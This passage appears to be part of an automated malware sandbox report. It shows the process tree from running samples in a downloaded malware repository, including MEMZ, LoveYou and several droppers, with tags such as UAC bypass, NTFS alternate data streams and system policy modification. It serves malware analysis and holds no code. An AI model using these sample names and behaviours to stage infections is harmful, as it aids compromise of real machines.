                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                • System policy modification
                                                                                                                                                                                                                                                                                                                                                PID:3368
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J03Z30J6V06J5AY6R36.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\J03Z30J6V06J5AY6R36.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5600
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\Q15V01T2P28A8DF0X38.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\Q15V01T2P28A8DF0X38.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5620
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\U81P07U2W85E3JS4S85.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\U81P07U2W85E3JS4S85.exe"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                    PID:6076
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\M50B72M7L60T1YS3F62.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\M50B72M7L60T1YS3F62.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:380
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R66R62J3H17Y4BL7F81.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\R66R62J3H17Y4BL7F81.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:3548
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MEMZ.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MEMZ.exe"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                • System policy modification
                                                                                                                                                                                                                                                                                                                                                PID:2928
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\X55D25S7W67A0XD3C11.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\X55D25S7W67A0XD3C11.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  PID:4348
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\Z13F66V0M30K6VX1P46.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\Z13F66V0M30K6VX1P46.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5892
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\O11Y52U3Y60V8PM2R71.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\O11Y52U3Y60V8PM2R71.exe"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                    • System policy modification
                                                                                                                                                                                                                                                                                                                                                    PID:2132
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\J84P86Z0M27X6DC1I31.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\J84P86Z0M27X6DC1I31.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  PID:5592
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\E20V67S5I68P0YP4Q65.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\E20V67S5I68P0YP4Q65.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:984
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\L0Lz.bat
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\L0Lz.bat"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                • System policy modification
                                                                                                                                                                                                                                                                                                                                                PID:3720
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\U62F60C7I03T7LQ2C66.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\U62F60C7I03T7LQ2C66.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:1788
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\J82C63T4W37J6VS3F32.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\J82C63T4W37J6VS3F32.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:1100
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\T73F57W2L20P5LP0F57.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\T73F57W2L20P5LP0F57.exe"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                    • System policy modification
                                                                                                                                                                                                                                                                                                                                                    PID:1384
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\S54M83Y4V25W6DY3X36.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\S54M83Y4V25W6DY3X36.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:1608
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\X61C84V0R64B0GQ6Y54.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\X61C84V0R64B0GQ6Y54.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5632
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\LoveYou.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\LoveYou.exe"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                • System policy modification
                                                                                                                                                                                                                                                                                                                                                PID:2736
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\E37P65A1Z03I0BC8L81.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\E37P65A1Z03I0BC8L81.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:3684
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\Q56C36I3O54F6HC5R11.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\Q56C36I3O54F6HC5R11.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  PID:1948
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\N27N55I4M05G7CE6H88.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\N27N55I4M05G7CE6H88.exe"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                    PID:3380
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\M02H17A7L14Y8CP8Z35.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\M02H17A7L14Y8CP8Z35.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:2112
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\F45D57J8K80X8TZ8L24.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\F45D57J8K80X8TZ8L24.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:4456
                                                                                                                                                                                                                                                                                                                                              • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                PID:6020
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\PCToaster.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\PCToaster.exe"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                PID:3044
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\Q55O84K4P15O0FB6D56.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\Q55O84K4P15O0FB6D56.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  PID:4244
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\F34P15M0K42G3RY0X68.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\F34P15M0K42G3RY0X68.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:1848
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\N27Y13K5M56P1AD7T44.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\N27Y13K5M56P1AD7T44.exe"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                    • UAC bypass
                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                    • System policy modification
                                                                                                                                                                                                                                                                                                                                                    PID:2380
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\K41F16J5G80L6VQ3Y87.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\K41F16J5G80L6VQ3Y87.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:5880
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\T23P36N5F77Y6DV3Q82.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\T23P36N5F77Y6DV3Q82.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:2060
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\TaskILL.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\TaskILL.exe"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                PID:1504
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\D48J22L8J87U2MX8Z33.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\D48J22L8J87U2MX8Z33.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  PID:228
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\K61F83W5D08M5OE2E34.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\K61F83W5D08M5OE2E34.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  PID:5068
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\V11R42X2V76E0VE7N35.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\MrsMajors\BossDaMajor\V11R42X2V76E0VE7N35.exe"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                    • System policy modification
                                                                                                                                                                                                                                                                                                                                                    PID:3184
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\F05L64O1Z50E8JR6M68.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Spark\F05L64O1Z50E8JR6M68.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:1516
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\K12B64M6V87J1NJ0N86.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\XCSSETMacMalware\K12B64M6V87J1NJ0N86.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                                                                                                                                  PID:3556
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Sevgi.a.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Sevgi.a.exe"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                PID:6028
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\M57Y76R0M72L8VQ5C62.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Mist\M57Y76R0M72L8VQ5C62.exe"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
